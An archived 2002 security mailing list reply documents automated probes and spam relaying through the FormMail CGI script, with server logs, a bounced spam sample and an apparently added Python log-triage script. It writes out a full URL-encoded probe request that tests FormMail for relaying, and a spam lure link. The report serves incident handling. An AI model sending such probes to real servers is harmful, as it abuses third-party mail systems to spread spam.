Security Incidents mailing list archives
Re: Matt Wright FormMail Attacks
From: "Mike Lewinski" <mike () rockynet com>
Date: Mon, 14 Jan 2002 10:30:32 -0700
> Looks like people are not serious about this probe. Does anybody know why the number of formmail.pl attacks is growing? Maybe it is part of a SPAM toolkit or some very popular tool?
Yes, I've seen (and reported) what appear to be automated probes for vulnerable installations. We had a client install that script on one of our servers and I was fortunate to notice the bounces coming back to us very quickly. I am including two reports I filed, in case the log patterns are of use to anyone. Note that in the first probe below, the attacker's subject line identifies the server that was attempted.

Mike

----------------------------------------------------------------------------

1) Failed probe:

GMT offset is -0700. This is a probe for a formmail.pl cgi script that can be used to relay spam. It generated a 404 here.

Session Details
IP Address          65.34.109.21
Reverse DNS         6534109hfc21.tampabay.rr.com
Time Spent          0 min
Hits / Kilobytes    1 / 0.61Kb
Browser Tag         Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)
Referring URL
Date and Time        URL
2002-01-07 19:20:24  /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=www%2ecoloradowild%2eorg%2fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t

----------------------------------------------------------------------------

2) Successful relays:

The log times below are set to UTC, and were recorded on Jan 01, 2001. Also attached is a sample of the bounced spam that was relayed through this client's script (now disabled).

00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80 Microsoft+URL+Control+-+6.00.8862 -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80 Microsoft+URL+Control+-+6.00.8862 -
13:17:51 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1737 80 Microsoft+URL+Control+-+6.00.8862 -
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -
21:15:23 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11562 1495 80 Microsoft+URL+Control+-+6.00.8862 -
21:16:27 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1329 80 Microsoft+URL+Control+-+6.00.8862 -
21:26:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11780 1554 80 Microsoft+URL+Control+-+6.00.8862 -
21:28:54 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11462 1241 80 Microsoft+URL+Control+-+6.00.8862 -
21:35:09 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11615 1391 80 Microsoft+URL+Control+-+6.00.8862 -
21:40:39 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11323 1108 80 Microsoft+URL+Control+-+6.00.8862 -
21:42:33 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11549 1331 80 Microsoft+URL+Control+-+6.00.8862 -
21:42:58 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11535 1316 80 Microsoft+URL+Control+-+6.00.8862 -
21:43:26 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11674 1459 80 Microsoft+URL+Control+-+6.00.8862 -
21:43:56 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11930 1705 80 Microsoft+URL+Control+-+6.00.8862 -
21:44:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11344 1121 80 Microsoft+URL+Control+-+6.00.8862 -
21:45:14 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11817 1589 80 Microsoft+URL+Control+-+6.00.8862 -
21:49:47 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 8597 1477 80 Microsoft+URL+Control+-+6.00.8862 -
21:55:43 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11695 1250 80 Microsoft+URL+Control+-+6.00.8862 -
22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80 Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1601 80 Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1336 80 Microsoft+URL+Control+-+6.00.8862 -
22:09:38 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1308 80 Microsoft+URL+Control+-+6.00.8862 -
22:11:06 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1533 80 Microsoft+URL+Control+-+6.00.8862 -
22:18:28 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1580 80 Microsoft+URL+Control+-+6.00.8862 -
22:18:34 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1236 80 Microsoft+URL+Control+-+6.00.8862 -

Note that this spam sample matches the line above by timestamp. It does not otherwise show the originating IP in the headers (a flaw in Blat IMHO):

21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -

Received: from rockynet.com (smtp.rockynet.com [206.168.216.11]) by rly-xc01.mx.aol.com (v83.18) with ESMTP id MAILRELAYINXC17-0101160728; Tue, 01 Jan 2002 16:07:28 -0500
Received: from web3 [206.168.216.8] by rockynet.com (SMTPD32-7.04) id A5112EDA00F2; Tue, 01 Jan 2002 14:07:29 -0700
Date: Tue, 01 Jan 2002 14:07:29 -0700
From: arkansas () candycanelane com
Sender: webmaster () rockynet com
Reply-to: webmaster () rockynet com
Subject: Need Extra Money? O794A2kx7cob4zQ
To: diana63814 () aol com, laver76 () aol com, pologuy21 () aol com, diana63828 () aol com, shanlynn () aol com, diana639 () aol com, laver7 () aol com, budmld () aol com, shanlynne () aol com, budmlh58 () aol com, alisha4972 () aol com, geoander () aol com, budmmann2 () aol com, shanlynng () aol com, tomdawgo7 () aol com, mlewis9106 () aol com, jens235 () aol com, jens239 () aol com, budmn151 () aol com
X-Mailer: WinNT's Blat ver 1.8.2b http://www.interlog.com/~tcharron
Message-Id: <200201011407277.SM00203@web3>

This is an online application from (arkansas () candycanelane com) on Tuesday, January 1, 2002 at 14:07:29

-------------------------------------------------------

: <br><HTML><FONT BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10><BR><BR>EARN MONEY WORKING AT HOME<BR>WORK THE HOURS YOU WANT<BR><A HREF="aol:/2000:http://www.ckoejzldwoji.com () tiffany6811 tripod com/#jcispqeq vxunb">CLICK HERE</A> FOR DETAILS<BR><BR></FONT></HTML><br><p><br><p><br><p><br><p><br><p><br><p>28D0c k0SFAK7tb6jNInX7sPazoxX30PrqyoY06k9hp8dSUb5954vAVs95214lW6L28D0ck0SFAK7tb6jN InX7sPazoxX30PrqyoY06k9hp8ddx7mJEj2544dJLaA21M1tM3B8QT7ls9CVQUFcjYrWYoG43YiE wfO09

-------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
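The three log patterns in the report above (a URL-encoded GET probe whose subject field names the host being tested, a run of POSTs to the FormMail script with the "Microsoft URL Control" user agent, and a bounce whose only link back to the relaying client is its timestamp) can be triaged mechanically. The following Python is an added example, not code from the original post. Its sample records are condensed, constructed copies of the lines in the report; the IIS field order (time, client IP, method, URI stem, URI query, status, bytes sent, bytes received, port, user agent, referer) is an assumption drawn from how the records read; and log times are assumed to be UTC on the same calendar day as the bounce's Date header, as the post states.

```python
"""Triage FormMail probe and relay records from web server logs.

Added example, not part of the original post. The sample records below are
constructed from the report above (condensed). The IIS field order is an
assumption drawn from how the records read:
  time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes
  s-port cs(User-Agent) cs(Referer)
"""
from collections import defaultdict
from datetime import timezone
from email.utils import parsedate_to_datetime
from urllib.parse import parse_qs, urlsplit

# Script names hit by the probe and by the relay run in the report.
FORMMAIL_PATHS = ("/cgi-bin/formmail.pl", "/cgi-bin/formmail.cgi")

# User agent carried by every relay POST in the report (IIS logs spaces as '+').
RELAY_UA = "Microsoft+URL+Control+-+6.00.8862"

# Constructed sample: the GET probe from the first report.
PROBE_REQUEST = (
    "/cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=www%2ecoloradowild"
    "%2eorg%2fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t"
)

# Constructed sample: a handful of the IIS records from the second report,
# plus one unrelated GET that the triage must ignore.
IIS_LOG = """\
00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80 Microsoft+URL+Control+-+6.00.8862 -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80 Microsoft+URL+Control+-+6.00.8862 -
13:17:51 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1737 80 Microsoft+URL+Control+-+6.00.8862 -
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -
22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80 Microsoft+URL+Control+-+6.00.8862 -
10:00:00 192.0.2.10 GET /index.html - 200 1200 300 80 Mozilla/4.0+(compatible) -
"""


def decode_probe(request_uri):
    """Decode a FormMail probe's query string, or return None if it is not one.

    The probe mails a copy to the attacker; 'subject' carries the host the
    attacker thought it was testing, which is how a bounce reveals the target.
    """
    parts = urlsplit(request_uri)
    if parts.path.lower() not in FORMMAIL_PATHS:
        return None
    fields = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {
        "path": parts.path,
        "from": fields.get("email"),
        "recipient": fields.get("recipient"),
        "target_host": fields.get("subject"),
        "body": fields.get("msg"),
    }


def parse_iis_line(line):
    """Split one IIS record into a dict using the assumed field order above."""
    f = line.split()
    if len(f) < 10:
        return None
    return {"time": f[0], "ip": f[1], "method": f[2], "path": f[3],
            "status": int(f[5]), "ua": f[9]}


def triage(log_text):
    """Count FormMail relay attempts per client IP.

    A POST to a FormMail path is a relay attempt; status 200 means the script
    ran and mailed (a successful relay), anything else a failed attempt.
    """
    summary = defaultdict(lambda: {"relayed": 0, "failed": 0, "first": None,
                                   "last": None, "ua_match": False})
    for raw in log_text.splitlines():
        rec = parse_iis_line(raw)
        if not rec or rec["method"] != "POST" or rec["path"].lower() not in FORMMAIL_PATHS:
            continue
        s = summary[rec["ip"]]
        s["relayed" if rec["status"] == 200 else "failed"] += 1
        s["first"] = s["first"] or rec["time"]
        s["last"] = rec["time"]
        s["ua_match"] = s["ua_match"] or rec["ua"] == RELAY_UA
    return dict(summary)


def match_bounce(date_header, log_text, window=5):
    """Find relay POSTs within `window` seconds of a bounced message's Date.

    The bounce carries no originating IP (Blat put none in the headers), so
    the web log is the only place the relaying client's address appears.
    Log times are assumed UTC on the same calendar day as the Date header.
    """
    sent = parsedate_to_datetime(date_header).astimezone(timezone.utc)
    hits = []
    for raw in log_text.splitlines():
        rec = parse_iis_line(raw)
        if not rec or rec["path"].lower() not in FORMMAIL_PATHS:
            continue
        h, m, s = (int(x) for x in rec["time"].split(":"))
        logged = sent.replace(hour=h, minute=m, second=s)
        if abs((logged - sent).total_seconds()) <= window:
            hits.append((rec["time"], rec["ip"]))
    return hits


if __name__ == "__main__":
    print(decode_probe(PROBE_REQUEST))
    for ip, info in triage(IIS_LOG).items():
        print(ip, info)
    print(match_bounce("Tue, 01 Jan 2002 14:07:29 -0700", IIS_LOG))
```

Run against the constructed sample, the probe decodes to a recipient of bxw@aol.com and a subject of www.coloradowild.org/cgi-bin/formmail.pl, the triage attributes two successful and one failed relay to 66.125.153.7 with the URL Control user agent on every request, and the bounce dated 14:07:29 -0700 lands one second from the 21:07:30 UTC record, which is the correlation the post makes by hand. The 200-means-relayed rule is only a heuristic for a script that returns a thank-you page after mailing; a 502 here is a gateway error and does not by itself prove the mail was not sent.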
Current thread:
- RE: Matt Wright FormMail Attacks Pence, Derek A. (Jan 14)
- Re: Matt Wright FormMail Attacks Brannon (Jan 14)
- Re: Matt Wright FormMail Attacks Markus Stumpf (Jan 15)
- <Possible follow-ups>
- RE: Matt Wright FormMail Attacks Turner, Keith (Jan 14)
- RE: Matt Wright FormMail Attacks Christopher X. Candreva (Jan 14)
- RE: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Matt Wright FormMail Attacks Dmitri Smirnov (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Re: Matt Wright FormMail Attacks jlewis (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Michael Hottinger (Jan 15)